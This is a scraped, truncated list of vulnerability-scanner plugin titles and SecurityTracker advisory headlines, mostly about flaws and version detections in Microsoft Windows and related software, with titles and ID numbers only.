Microsoft Internet Explorer Information Disclosure Vulnerability (980088) [800435] Google SketchUp Multiple Vulnerabilities (Windows) [800429] Microsoft Internet Explorer Remote Code Execution Vulnerability (979352) [800382] Microsoft PowerPoint File Parsing Remote Code Execution Vulnerability (967340) [800347] Microsoft Internet Explorer Clickjacking Vulnerability [800343] Microsoft Word 2007 Sensitive Information Disclosure Vulnerability [800337] Microsoft Internet Explorer NULL Pointer DoS Vulnerability [800267] Microsoft GDIPlus Library File Integer Overflow Vulnerability [800247] Wireshark Multiple Vulnerabilities Feb-09 (Windows) [800218] Microsoft Money 'prtstb06.dll' Denial of Service vulnerability [800217] Microsoft Money Version Detection [800215] PGP Desktop Version Detection (Windows) [800209] Microsoft Internet Explorer Version Detection (Win) [800208] Microsoft Internet Explorer Anti-XSS Filter Vulnerabilities [800192] HP SMH Insight Diagnostics Cross Site Scripting Vulnerability - Windows [800120] Google Chrome Version Detection (Windows) [800106] Adobe Reader/Acrobat JavaScript Method Handling Vulnerability (Windows) [800083] Microsoft Outlook Express Malformed MIME Message DoS Vulnerability [800082] Microsoft SQL Server sp_replwritetovarbin() BOF Vulnerability [800040] Wireshark Multiple Vulnerabilities - Oct08 (Windows) [800016] Mozilla SeaMonkey Version Detection (Windows) [800000] VMWare products version detection (Windows) [103254] Microsoft SharePoint Server 2007 '_layouts/help.aspx' Cross Site Scripting Vulnerability [102015] Microsoft RPC Interface Buffer Overrun (KB824146) [101100] Vulnerabilities in Microsoft ATL Could Allow Remote Code Execution (973908) [101018] Windows SharePoint Services detection [101017] Microsoft MS03-018 security check [101016] Microsoft MS03-022 security check [101015] Microsoft MS03-034 security check [101014] Microsoft MS00-078 security check [101012] Microsoft MS03-051 security check [101010] Microsoft Security Bulletin MS05-004 [101009] Microsoft Security Bulletin MS06-033 [101007] Microsoft dotNET version grabber [101006] Microsoft Security Bulletin MS06-056 [101005] Microsoft Security Bulletin MS07-040 [101004] Microsoft MS04-017 security check [101003] Microsoft MS00-058 security check [101000] Microsoft MS00-060 security check [100952] Microsoft IIS FTPd NLST stack overflow [100950] Microsoft DNS server internal hostname disclosure detection [100608] Windows NT NNTP Component Buffer Overflow [100607] Microsoft SMTP Service and Exchange Routing Engine Buffer Overflow Vulnerability [100357] Cisco VPN Client for Windows 'StartServiceCtrlDispatche' Local Denial of Service Vulnerability [100062] Microsoft Remote Desktop Protocol Detection [96204] Get Windows Eventlog Entries over WMI [90020] Windows vulnerability in DNS Client Could Allow Spoofing (945553) [80007] Microsoft MS00-06 security check [64922] Debian Security Advisory DSA 1890-1 (wxwindows2.4 wxwidgets2.6 wxwidgets2.8) [20377] Windows Server Update Services detection [14229] HTTP Directory Traversal (Windows) [13752] Denial of Service (DoS) in Microsoft SMS Client [11992] Vulnerability in Microsoft ISA Server 2000 H.323 Filter(816458) [11887] Buffer Overflow in Windows Troubleshooter ActiveX Control (826232) [11808] Microsoft RPC Interface Buffer Overrun (823980) [11443] Microsoft IIS UNC Mapped Virtual Host Vulnerability [11433] Microsoft ISA Server DNS - Denial Of Service (MS03-009) [11429] Windows Messenger is installed [11217] Microsoft's SQL Version Query [11177] Flaw in Microsoft VM Could Allow Code Execution (810030) [11160] Windows Administrator NULL FTP password [11147] Unchecked Buffer in Windows Help(Q323255) [11146] Microsoft RDP flaws could allow sniffing and DOS(Q324380) [11091] Windows Network Manager Privilege Elevation (Q326886) [11067] Microsoft's SQL Hello Overflow [10964] Windows Debugger flaw can Lead to Elevated Privileges (Q320206) [10930] HTTP Windows 98 MS/DOS device names DOS [10929] FTP Windows 98 MS/DOS device names DOS [10862] Microsoft's SQL Server Brute Force [10755] Microsoft Exchange Public Folders Information Leak [10680] Test Microsoft IIS Source Fragment Disclosure [10674] Microsoft's SQL UDP Info Query [10673] Microsoft's SQL Blank Password [10491] ASP/ASA source using Microsoft Translate f: bug [10144] Microsoft SQL TCP/IP listener is running SecurityTracker - https://www.securitytracker.com: [1028903] Microsoft Windows Unicode Scripts Processor Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1028754] Microsoft Windows Defender Pathname Bug Lets Local Users Gain Elevated Privileges [1028748] Microsoft Windows GDI+ TrueType Font Parsing Flaw Lets Remote Users Execute Arbitrary Code [1027934] Microsoft Windows Includes Some Invalid TURKTRUST Certificates [1027389] Microsoft Visual Basic Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027385] Microsoft Visual FoxPro Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027384] Microsoft Host Integration Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027383] Microsoft Commerce Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027381] Microsoft SQL Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027380] Microsoft Office Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027114] Microsoft Windows Includes Some Invalid Certificates [1027043] Microsoft Windows Partition Manager Memory Allocation Error Lets Local Users Gain Elevated Privileges [1026905] Microsoft BizTalk Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026904] Microsoft Visual Basic Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026903] Microsoft Visual FoxPro Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026902] Microsoft Commerce Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026900] Microsoft Office Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026899] Microsoft SQL Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026685] Microsoft Windows Ancillary Function Driver Lets Local Users Gain Elevated Privileges [1026497] Microsoft Windows ClickOnce Feature Lets Remote Users Execute Arbitrary Code [1026271] Microsoft Windows TrueType Font Parsing Flaw Lets Remote Users Execute Arbitrary Code [1026167] Microsoft Windows Ancillary Function Driver Lets Local Users Gain Elevated Privileges [1026103] Microsoft Windows SSL/TLS Protocol Flaw Lets Remote Users Decryption Sessions [1026041] Microsoft Windows Components DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026037] Microsoft Windows Internet Name Service (WINS) Input Validation Flaw in ECommEndDlg() Lets Local Users Gain Elevated Privileges [1025937] Microsoft Windows DHCPv6 Processing Flaw Lets Remote Denial of Service to RPC Services [1025760] Microsoft Windows Bluetooth Stack Memory Access Error Lets Remote Users Execute Arbitrary Code [1025643] Microsoft Windows Ancillary Function Driver Lets Local Users Gain Elevated Privileges [1025634] Microsoft Windows OLE Automation Underflow Lets Remote Users Execute Arbitrary Code [1025512] Microsoft Windows Internet Name Service Socket Send Exception Handling Bug Lets Remote Users Execute Arbitrary Code [1025330] Microsoft WMITools and Windows Messenger ActiveX Controls Let Remote Users Execute Arbitrary Code [1025312] Microsoft Windows Kernel Bug in AFD.sys Lets Local Users Deny Service [1025248] Microsoft Windows Includes Some Invalid Comodo Certificates [1024879] Microsoft Windows Internet Connection Signup Wizard May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024877] Microsoft Windows May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024874] Microsoft Windows Task Scheduler Lets Local Users Gain Elevated Privileges [1024441] Microsoft Windows RPC Memory Allocation Error Lets Remote Users Execute Arbitrary Code [1024312] Microsoft Windows Tracing Feature for Services Lets Local Users Gain Elevated Privileges [1024216] Microsoft Windows Shell LNK Shortcut Processing Flaw Lets Users Execute Arbitrary Code [1023571] Microsoft Windows Protocol Flaw in SSL Renegotiation Lets Remote Users Conduct Man-in-the-Middle Attacks [1023566] Microsoft Windows Kerberos Ticket-Granting-Ticket Processing Flaw Lets Remote Authenticated Users Deny Service [1023495] Microsoft Internet Explorer and Windows OS Shell Handler URL Validation Flaw Lets Remote Users Execute Arbitrary Code [1022710] Microsoft Windows Internet Name Service (WINS) Buffer Overflows Let Remote Users Execute Arbitrary Code [1022330] Microsoft Windows Bug in SETDESKWALLPAPER and GETDESKWALLPAPER Calls Let Local Users Deny Service [1022047] Microsoft Windows SearchPath Function May Let Remote Users Execute Arbitrary Code [1022044] Microsoft Windows Privilege Separation and Access Control Bugs Let Local Users Gain Elevated Privileges [1021629] Microsoft Windows Guidelines for Disabling AutoRun are Ineffective and May Permit Code Execution [1021369] Microsoft Visual Basic DataGrid/FlexGrid/Heirarchival FlexGrid/Windows Common/Charts ActiveX Controls Let Remote Users Execute Arbitrary Code [1020678] Microsoft Windows IPSec Policy May Not Be Enforced in Certain Cases [1020677] Microsoft Windows Event System Bugs Let Remote Authenticated Users Execute Arbitrary Code [1020446] Microsoft Windows AutoRun Bug May Let Users Execute Arbitrary Code [1020006] Microsoft Windows XP 'i2omgmt.sys' Input Validation Flaw Lets Local Users Gain Elevated Privileges [1019165] Microsoft Windows LSASS Lets Local Users Gain Elevated Privileges [1018942] Microsoft Windows DNS Service Insufficent Entropy Lets Remote Users Spoof the DNS Service [1018831] Microsoft Windows ShellExecute() URI Handler Bug Lets Remote Users Execute Arbitrary Commands [1017910] Microsoft Windows DNS Service RPC Stack Overflow Lets Remote Users Execute Arbitrary Code [1017901] Microsoft Windows Help File Heap Overflow Lets Remote Users Execute Arbitrary Code [1017827] Microsoft Windows Animated Cursor Bug Lets Remote Users Execute Arbitrary Code [1017736] Microsoft Windows Explorer OLE Parsing Bug Lets Users Deny Service [1017641] Microsoft Windows RichEdit OLE Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1017636] Microsoft Windows Defender Integer Overflow in Parsing PDF Files Lets Remote Users Execute Arbitrary Code [1017441] Microsoft Windows Workstation Service Memory Allocation Error in NetrWkstaUserEnum() Lets Remote Users Deny Service [1017369] Microsoft Outlook Express Buffer Overflow in Processing Windows Address Book Files Let Remote Users Execute Arbitrary Code [1017168] Microsoft Windows Kernel GDI Data Structure Processing Bug Lets Local Users Gain Elevated Privileges [1016941] Microsoft Windows Shell Integer Overflow Lets Remote Users Execute Arbitrary Code [1016388] Microsoft Windows Explorer Lets Remote Users Access Information in Other Domains and Execute HTA Applications [1016339] Microsoft Windows 'hlink.dll' Buffer Overflow in Processing Hyperlinks Lets Remote Users Execute Arbitrary Code [1016292] Microsoft Windows Buffer Overflow in AOL ART Image Rendering Library Lets Remote Users Execute Arbitrary Code [1016290] Microsoft Windows Buffer Overflow in TCP/IP Stack Lets Remote Users Execute Arbitrary Code [1016286] Microsoft Windows 98 Graphics Rendering Engine Buffer Overflow in Processing WMF Images Lets Remote Users Execute Arbitrary Code [1015898] Microsoft Outlook Express Buffer Overflow in Processing Windows Address Books Lets Remote Users Execute Arbitrary Code [1015897] Microsoft Windows Explorer COM Object Bug Lets Remote Users Execute Arbitrary Code [1015765] Microsoft Windows Services Have Unsafe Default ACLs That Let Remote Authenticated Users Gain Elevated Privileges [1015630] Microsoft Windows Web Client Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code [1015629] Microsoft Windows IGMP Processing Bug Lets Remote Users Deny Service [1015595] Microsoft Windows UPnP/NetBT/SCardSvr/SSDP Services May Be Incorrectly Configured By 3rd Party Applications, Allowing Local Users to Gain Elevated Privileges [1015459] Microsoft Windows Embedded Web Fonts Buffer Overflow Lets Remote Users Execute Arbitrary Code [1015453] Microsoft Windows Graphics Rendering Engine WMF File Memory Access Error Lets Remote Users Execute Arbitrary Code [1015416] Microsoft Windows Unspecified WMF Rendering Bug Lets Remote Users Execute Arbitrary Code [1015349] Microsoft Windows Internet Explorer May Let Remote Users Obfuscate the Download Dialog Box [1015347] Microsoft Windows 2000 Kernel APC Queue Bug Lets Local Users Gain Elevated Privileges [1015233] Microsoft Windows RPC Service May Let Remote Users Deny Service [1015168] Microsoft Windows Buffer Overflows in Graphics Rendering Engine Lets Remote Users Execute Arbitrary Code [1015049] Microsoft Internet Explorer Drag-and-Drop Timing May Let Remote Users Install Arbitrary Files [1015044] Microsoft Windows Multiple COM Objects Let Remote Users Execute Arbitrary Code [1015042] Microsoft Windows Plug and Play Buffer Overflow Lets Remote Users Execute Arbitrary Code [1015040] Microsoft Windows Shell Bugs in Processing '.lnk' Files and in Web View Preview Mode Lets Remote Users Execute Arbitrary Code [1015039] Microsoft Windows Buffer Overflow in Collaboration Data Objects Lets Remote Users Execute Arbitrary Code [1015037] Microsoft Windows Buffer Overflows in MSDTC and COM+ Let Remote Users Execute Arbitrary Code and Local User Gain Elevated Privileges [1015036] Microsoft Windows FTP Client Input Validation Hole Lets Remote Servers Create/Overwrite Files on the Target User's System [1014829] Microsoft Windows Firewall User Interface May Not Properly Display Exception Rules [1014642] Microsoft Windows Kerberos and PKINIT Vulnerabilities Allow Denial of Service, Information Disclosure, and Spoofing [1014640] Microsoft Windows Plug and Play Stack Overflow Lets Remote Users Execute Arbitrary Code [1014639] Microsoft Windows Telephony Service Remote Code Execution or Local Privilege Escalation [1014638] Microsoft Windows Print Spooler Service Buffer Overflow Lets Remote Users Execute Arbitrary Code [1014498] Microsoft Windows Remote Desktop Protocol Bug Lets Remote Users Deny Service [1014417] Microsoft Windows Named Pipe NULL Session Bugs in svcctl and eventlog RPC Interfaces Disclose Information to Remote Users [1014198] Microsoft Windows Buffer Overflow in Processing Server Message Block Packets Lets Remote Users Execute Arbitrary Code [1014196] Microsoft Windows Buffer Overflow in Web Client Service Lets Remote Authenticated Users Execute Arbitrary Code [1013761] Microsoft Windows Explorer 'webvw.dll' Input Validation Error Lets Remote Users Execute Arbitrary Scripting Code [1013689] Microsoft Windows Shell MSHTA Lets Remote Users Code Execute Arbitrary Scripting Code [1013688] Microsoft Windows Kernel and Font Buffer Overflows Let Local Users Deny Service or Obtain System Privileges [1013686] Microsoft Windows TCP, IP, and ICMP Processing Errors Let Remote Users Deny Service and Execute Arbitrary Code [1013552] Microsoft Windows Remote Desktop 'TSShutdn.exe' Lets Remote Authenticated Users Shutdown the System [1013284] Microsoft Windows 2000 and XP Group Policy Can Be Bypassed By Microsoft Office Applications and By Flash Drives [1013120] Microsoft Windows OLE Buffer Overflow Lets Remote Users Execute Arbitrary Code and COM Access Flaw Lets Remote Authenticated Users Gain Elevated Privileges [1013119] Microsoft Windows Hyperlink Object Library Lets Remote Users Execute Arbitrary Code [1013117] Microsoft Windows License Logging Service Lets Remote Users Execute Arbitrary Code [1013115] Microsoft Windows Media Player Buffer Overflow in Processing PNG Files Lets Remote Users Execute Arbitrary Code [1013114] Microsoft Windows SMB Lets Remote Users Execute Arbitrary Code [1013112] Microsoft Windows XP Named Pipe Validation Error Lets Remote Users Obtain Information [1012891] Microsoft IE Windows XP SP2 File Download Security Can Be Bypassed With Dynamic IFRAME Tag [1012684] Microsoft Windows LoadImage API Buffer Overflow Lets Remote Users Execute Arbitrary Code [1012683] Microsoft Windows ANI File Parsing Errors Let Remote Users Deny Service [1012682] Microsoft Windows Help System Buffer Overflows in Processing Phrase Compressed Help Files Lets Remote Users Execute Arbitrary Code [1012626] Microsoft Windows Media Player setItemInfo Lets Remote Users Execute Arbitrary Code [1012515] Microsoft Windows NT 4.0 Buffer Overflows in the Logging and Processing of DHCP Packets May Let Remote Users Execute Arbitrary Code [1012513] Microsoft Windows Kernel Buffer Overflow in Processing Local Procedure Call Messages Lets Local Users Gain System Privileges [1012458] Microsoft Internet Explorer Lets Remote Users Inject Content into Open Windows [1012435] Microsoft Windows Resource Kit Buffer Overflow and Input Validation Holes in 'w3who.dll' May Permit Remote Code Execution and Cross-Site Scripting Attacks [1011940] Microsoft Remote Desktop on Windows XP Lets Remote Authenticated Users Restart the System [1011880] Microsoft Windows XP Error in Explorer in Processing WAV Files Lets Remote Users Deny Service [1011859] Microsoft Internet Explorer on Windows XP Fails to Restrict Drag and Drop Operations When Configured to Disable These Operations [1011647] Microsoft Windows Shell Buffer Overflows Let Remote Users Execute Arbitrary Code [1011637] Microsoft Windows Buffer Overflow in Processing Compressed Folders Lets Remote Users Execute Arbitrary Code [1010996] Microsoft Windows XP SP2 Local Computer Scripting Restrictions Can Be Bypassed With a Specially Crafted MHT File [1010959] Microsoft Windows Explorer (in XP SP2) May Fail to Warn Users When Executing Untrusted Files [1010688] Microsoft Windows Task Scheduler Buffer Overflow Lets Remote Users Execute Arbitrary Code [1010687] Microsoft Windows 2000/NT POSIX Subsystem Buffer Overflow Lets Local Users Gain Elevated Privileges [1010352] Microsoft Windows 2000 Domains With Eight Characters May Let Remote Users With Expired Passwords Login [1010314] Microsoft Windows IPSec Filtering Can Be Bypassed By Remote Users [1009940] Microsoft Windows Explorer Buffer Overflow in Processing SMB Share Names Lets Remote Users Execute Arbitrary Code [1009776] Microsoft Windows Kernel Local Descriptor Table Flaw Lets Local Users Gain Elevated Privileges [1009771] Microsoft Windows Negotiate Security Software Provider (SSP) Buffer Overflow Lets Remote and Local Users Execute Arbitrary Code [1009770] Microsoft Windows Management Interface Provider Lets Local Users Gain Elevated Privileges [1009767] Microsoft Windows 2000 Domain Controller LDAP Flaw May Let Remote Users Restart the Authentication Service [1009762] Microsoft Windows COM Internet Services and RPC over HTTP Can Be Crashed By Remote Users [1009761] Microsoft Windows COM Object Identifier Creation Flaw May Let Remote Users Cause Applications to Open Network Ports [1009758] Microsoft Windows RCP Memory Leak Lets Remote Users Deny Service [1009673] Microsoft Windows XP 'mswebdvd.dll' Buffer Overflow Lets Remote Users Deny Service [1009359] Microsoft Windows Media Services Can Be Crashed By Remote Users [1009181] Microsoft Windows Explorer Heap Overflow in Processing '.emf' Files Permits Code Execution [1009008] Microsoft Windows Internet Naming Service (WINS) Length Validation Flaw Lets Remote Users Deny Service [1008699] Microsoft Windows Buffer Overflow in MDAC Lets Remote Users Execute Arbitrary Code [1008324] Microsoft Exchange 2003 With Outlook Web Access and Windows SharePoint Services May Grant Incorrect E-mail Account Access to Remote Authenticated Users [1008146] Microsoft Windows Workstation Service (wkssvc.dll) Buffer Overflow Lets Remote Users Execute Arbitrary Code with System Privileges [1007933] Microsoft Windows Messenger Service Buffer Overflow Lets Remote Users Execute Arbitrary Code With Local System Privileges [1007932] Microsoft Windows Troubleshooter ActiveX Control Buffer Overflow Lets Remote Users Execute Arbitrary Code [1007922] Microsoft Windows RPC Multi-threaded Race Condition Lets Remote Users Crash the Service or Execute Arbitrary Code [1007905] Microsoft Windows Server 2003 Shell Folders Can Be Referenced Using Directory Traversal Characters [1007874] Microsoft Windows OS PostThreadMessage() API Permits Local Users to Terminate Processes That Have Message Queues [1007670] Microsoft Windows Remote Procedure Call (RPC) DCOM Activation Buffer Overflows Let Remote Users Execute Arbitrary Code [1007615] Microsoft Windows NetBIOS Name Service May Disclose Memory Contents to Remote Users [1007281] Microsoft Windows NT File Management Flaw May Let Remote Users Crash Certain Applications [1007214] Microsoft Windows XP Shell Buffer Overflow in Processing Folder Display Attributes Permits Remote Code Execution [1007212] Microsoft Windows Remote Procedure Call (RPC) Service Buffer Overflow in Processing DCOM Requests Allows Remote Code Execution [1007152] Microsoft Windows 2000 Accessibility Utility Manager Lets Local Users Gain Elevated Privileges [1007099] Microsoft Windows 2000 ShellExecute() Buffer Overflow May Let Users Execute Arbitrary Code [1007093] Microsoft Active Directory Stack Overflow in 'Lsaas.exe' Lets Remote Users Crash the Windows 2000 Server [1007059] Microsoft Windows Media Services (nsiislog.dll) Extension to Internet Information Server (IIS) Has Another Buffer Overflow That Lets Remote Execute Arbitrary Code [1007057] Microsoft Windows Media Player Access Control Flaw Lets Remote Users View, Modify, and Delete Media Library Metadata [1006959] Microsoft Windows Server 2003 Drivers May Leak Information From Memory Via Ethernet Packets Containing TCP Streams [1006866] Microsoft Windows Media Services (nsiislog.dll) Extension to Internet Information Server (IIS) Lets Remote Execute Arbitrary Code [1006803] Microsoft Windows Can Be Crashed By Remote Users via Malformed NetMeeting URLs [1006588] Microsoft Windows OS Kernel Messaging Buffer Overflow Lets Local Users Gain Full Control of the System [1006580] Microsoft Windows 2003 'win2k.sys' Printing Bug Lets Users Crash the System [1006532] Microsoft Windows VM Input Validation Flaw in ByteCode Verifier Lets Malicious Java Applets Execute Arbitrary Code [1006447] Microsoft Windows Terminal Services RDP Implementation Does Not Validate Server Identity, Allowing Man-in-the-Middle Attacks [1006323] Microsoft Windows Buffer Overflow in Windows Script Engine JScript.DLL Lets Remote Users Execute Arbitrary Code [1006286] Microsoft Windows 2000/XP PostMessage() API Flaw May Let Local Users Grab Passwords from Local Dialog Boxes [1006179] Microsoft Windows Me Help and Support Center URL Handler Overflow Lets Remote Users Execute Arbitrary Code [1006121] Microsoft Windows 'riched20.DLL' Buffer Overflow May Let Remote Users Crash Applications [1006045] Microsoft Windows XP Redirector Buffer Overflow May Let Local Users Gain System Level Privileges [1005986] Microsoft Windows Terminal Server MSGINA.DLL Flaw Lets Remote Authenticated Users Reboot the Server [1005859] Microsoft Windows File Protection Mechanism Weakness in Trusting Code-Signing Certificate Chains Lets Arbitrary Remote Users Sign Code That Will Be Trusted By Windows [1005858] Microsoft Windows File Protection Weakness May Let Local Users Replace Code With Previous Vulnerable Versions Without Detection [1005833] Microsoft Windows XP Shell Buffer Overflow in Processing Audio Files Allows Remote Users to Execute Arbitrary Code [1005799] Microsoft Windows OS Bug in Processing WM_TIMER Messages May Let Local Users Gain Elevated Privileges [1005761] Microsoft Windows XP Wireless LAN Support May Disclose Access Point Information to Remote Users [1005455] Microsoft Windows Remote Procedure Call (RPC) Service Null Pointer Dereference Allows Remote Users to Crash the Service [1005454] Microsoft Windows Media Player for Solaris Uses Unsafe Default Permissions [1005343] Microsoft Windows Help System Bug in Processing Compiled HTML Help Files Lets Remote Users Execute Arbitrary Commands in the Local Computer Security Zone [1005336] Microsoft Windows Operating System Compressed Folders Allow Arbitrary Files to Be Created [1005335] Microsoft Windows Operating System Compressed Folders Allow Arbitrary Code to Be Executed [1005332] Microsoft Windows Help System Buffer Overflow in 'hhctrl.ocx' Lets Remote Users Execute Arbitrary Code [1005256] (Vendor Issues Fix) Microsoft Windows XP Remote Desktop Implementation Bug Lets Remote Users Crash the Operating System [1005242] Microsoft Windows XP Remote Desktop Can Be Crashed By Remote Users Sending a Modified RDP Packet [1005150] Microsoft Windows Operating System Certificate Enrollment ActiveX Control Allows Remote Users to Delete Certificates on a Target User's System [1005108] Microsoft Windows Media Player Allows Malicious Windows Media Download (.wmd) Files to Silently Create Files in a Known Location and Execute Them [1005070] Microsoft Internet Explorer (IE) Browser Error Message Processing Allows Remote Users to Execute Arbitrary Code on Certain Windows 98 Platforms [1005068] Microsoft NTFS Filesystem in Windows NT and Windows 2000 Has Auditing Hole That Lets Local Users Access Files Without the File Access Being Audited [1005063] Microsoft Windows XP Help and Support Center Hole Lets Remote Users Create URLs That, When Loaded, Will Delete Arbitrary Files on Your System [1004441] Microsoft Windows Help System Buffer Overflows in 'htctrl.ocx' ActiveX Control May Let Remote Users Execute Arbitrary Code on a Target User's Computer By Sending Malicious HTML [1004357] Microsoft Windows Debugging Facility for Windows NT4 and 2000 Has Authentication Hole That Lets Local Users Execute Arbitrary Code with SYSTEM Privileges [1004236] L.Y.S.I.A.S. Lidik Web Server for Microsoft Windows Systems Lets Remote Users View Files Located Anywhere on the Partition [1004083] Microsoft Windows 2000 'microsoft-ds' Service Flaw Allows Remote Users to Create Denial of Service Conditions By Sending Malformed Packets [1004022] Microsoft Windows 2000 Group Policy Object Enforcement Can Be Circumvented if User License Limits are Exceeded [1003975] Microsoft Windows NT, 2000, and XP Kernel Buffer Overflow in Processing Multiple UNC Provider (MUP) Requests May Let Local Users Obtain System Level Privileges [1003949] Microsoft Windows 2000 DCOM Implementation Flaw May Disclose Memory Contents to Remote Users [1003816] Microsoft Windows 2000 Automatic Log Off Policy Fails to Expire Sessions in Progress [1003764] Microsoft Windows Operating System Shell URL Handler Bug Lets Remote Users Create HTML That Could Cause Arbitrary Code to Be Executed on Another User's System in Certain Situations [1003687] Microsoft Windows 2000 and Windows XP SMTP Service Command Processing Bug Lets Remote Users Cause the SMTP Service to Crash [1003686] Microsoft Windows SMTP Service Lets Remote Users Send or Relay Unauthorized Mail (including SPAM) Via the Server [1003633] Microsoft XML Core Services in Microsoft Windows XP Operating System Lets Remote Scripts Access and Send Local Files [1003591] Microsoft Windows Terminal Services May Cause the System's Screen Saver Lockout Mechanism to Fail in Certain Situations [1003472] Microsoft Telnet Server for Windows 2000 and for Interix Has a Buffer Overflow That May Let Remote Users Execute Code on the Server with System Level Privileges [1003402] Microsoft Windows NT 4.0 and Windows 2000 Domain Controllers May Give Elevated Privileges to Remote Users Who Are Valid Administrators on Other Trusted Domains [1003369] PGPfire Personal Firewall for Microsoft Windows Discloses Identifying Information to Remote Users [1003310] Microsoft Windows NT/2000 Authentication Lockout Bug May Record Successful Logins as Failed Login Attempts in Certain Situations [1003308] Microsoft Windows XP Manifest Processing Bug Lets Local Users Corrupt the System and Cause the Boot Process to Fail [1003257] Microsoft Windows XP Upgrade Effectively Removes Patches from Internet Explorer (IE) During Upgrade, Leaving Users Exposed to IE Vulnerabilities [1003239] Python Language Implementation on Microsoft Windows Allows a Remote Server to Access Files on a Web Surfing User's PC [1003228] Microsoft Windows Media Player Discloses Unique ID to Remote Users in the Default Configuration, Allowing Web Sites to Track Users [1003221] Microsoft Internet Explorer (IE) Default Configuration Allows HTML-based Scripts to Access Your Windows Clipboard Contents [1003201] Microsoft Windows 95 Backup Utility Has Buffer Overflow That Could Cause Denial of Service Conditions [1003121] Microsoft Windows XP Task Manager Will Not Kill Certain Processes [1003041] Microsoft Windows XP Remote Desktop Client May Disclose Recently Used Account Names to Remote Users [1003028] Microsoft Windows Universal Plug and Play Component Buffer Overflow Gives Remote Users System Level Access to Windows XP and 98/ME Hosts [1003003] Microsoft Windows XP Hot Key Function Lets Physically Local Users Execute Administrator Hot Key Functions in Certain Situations [1002979] Microsoft Windows Explorer Discloses Stored FTP Passwords to Local Users [1002926] Microsoft Windows Operating System File Locking Design May Allow Local Users to Block Group Policy Scripts [1002922] Microsoft Windows 2000 Internet Key Exchange (IKE) Service Can Be Crashed By Remote Users [1002754] Terminal Services on Microsoft Windows 2000 and XP Allow Remote Users to Log Bogus IP Addresses Instead of the User's Genuine Address [1002731] Microsoft Windows 2000 RunAs Service May Disclose Authentication Credentials to Local Users [1002730] Microsoft Windows 2000 RunAs Utility May Disclose Sensitive Information to Local Users [1002729] Microsoft Windows 2000 RunAs Service Allows Local Users to Disable the Service [1002601] Microsoft Windows Me Universal Plug and Play (UPnP) Ssdpsrv.exe Server Component Can Be Crashed by Remote Users [1002519] TYPSoft FTP Server for Microsoft Windows Can Be Crashed by Remote Users [1002418] Counterpane's Password Safe Password Encryption Utility for Microsoft Windows May Disclose Passwords to Local Users in Certain Situations [1002394] Microsoft Windows NT Remote Procedure Call (RPC) Services Can Be Crashed With Malformed Packets [1002201] Microsoft Windows TCP/IP Stack Vulnerable to a Certain Man-in-the-Middle Denial of Service Attack [1002197] Microsoft Windows NNTP Network News Service Has a Memory Leak That Allows Remote Users to Cause the Server to Crash [1002124] Microsoft Windows 98 Operating System Can Be Crashed When Running a Web Server or Other Servers And the AUX Device is Accessed By the Program [1002106] Microsoft Windows 2000 and Windows NT 4.0 RPC Input Validation Failure Lets Remote Users Destabilize the Operating System [1002099] Microsoft Windows 2000 Telnet Service Can Be Crashed By Remote Users [1002098] Windows Terminal Services in Microsoft Windows 2000 and NT 4.0 Can Be Crashed By Remote Users Due to a Memory Leak [1001993] Microsoft Windows 2000, Linux 2.4, NetBSD, FreeBSD, and OpenBSD May Let Remote Users Affect TCP Performance [1001992] Microsoft Windows NT Lets Remote Users Cause Increased Packet Overhead and Increased CPU Resource Consumption [1001931] Microsoft Windows 2000 SMTP Service May Allow Unauthorized Remote Users to Relay E-mail via the Service [1001832] Microsoft Windows 2000 LDAP Server Lets Remote Users Gain Administrator Access to the Domain Controller When Configured to Support LDAP over SSL [1001701] Microsoft Windows 2000 Telnet Server Allows Local Users to Gain System-Level Privileges and Lets Remote Users Crash the Server [1001605] Microsoft Windows 2000 Allows Local Users to Elevate Privileges [1001603] Microsoft Windows Media Player May Allow Remote Users to Execute Code Contained in Internet Shortcuts and View Files on the Media Player's Host [1001587] Microsoft Word for Windows and for Mac May Run Macros Linked By RTF Documents Without Warning [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server [1001565] Microsoft IIS Web Server on Windows 2000 Allows Remote Users to Cause the Server to Consume All Available Memory Due to Memory Leak in WebDAV Lock Method [1001513] Microsoft Windows 2000 Indexing Service Allows Remote Users to View Include Programming Files [1001501] Microsoft Windows 2000 Domain Controllers Can Be Effectively Halted By Remote Users [1001467] Microsoft Windows Media Player ASX Processing Vulnerability Lets Remote Users Execute Arbitrary Code on the Player's Host System [1001464] Microsoft Internet Information Server IIS 5.0 for Windows 2000 Lets Remote Users Execute Arbitrary Code on the Server and Gain Control of the Server [1001360] Microsoft Windows Operating System DLL May Allow Malicious Remote Scripts to Run Code on the User's Host Without the User's Intervention [1001240] Microsoft FTP Client for Windows 2000 Still Vulnerable to Executing Arbitrary Code in Limited Situations [1001186] Microsoft Windows Me Operating System and Windows 98 with the Plus! 98 Package Disclose Data Compression Passwords [1001110] A Microsoft German-Language Hotfix for Windows NT 4 Incorrectly Displays Some Security Events as Other Security Events [1028910] Windows TCP/IP Stack ICMPv6 Memory Allocation Flaw Lets Remote Users Deny Service [1028909] Windows NAT Driver ICMP Processing Flaw Lets Remote Users Deny Service [1028908] Microsoft Active Directory Federation Services Discloses Account Information to Remote Users [1028907] Windows Kernel Lets Local Users Gain Elevated Privileges and Bypass ALSR [1028906] Windows RPC Bug 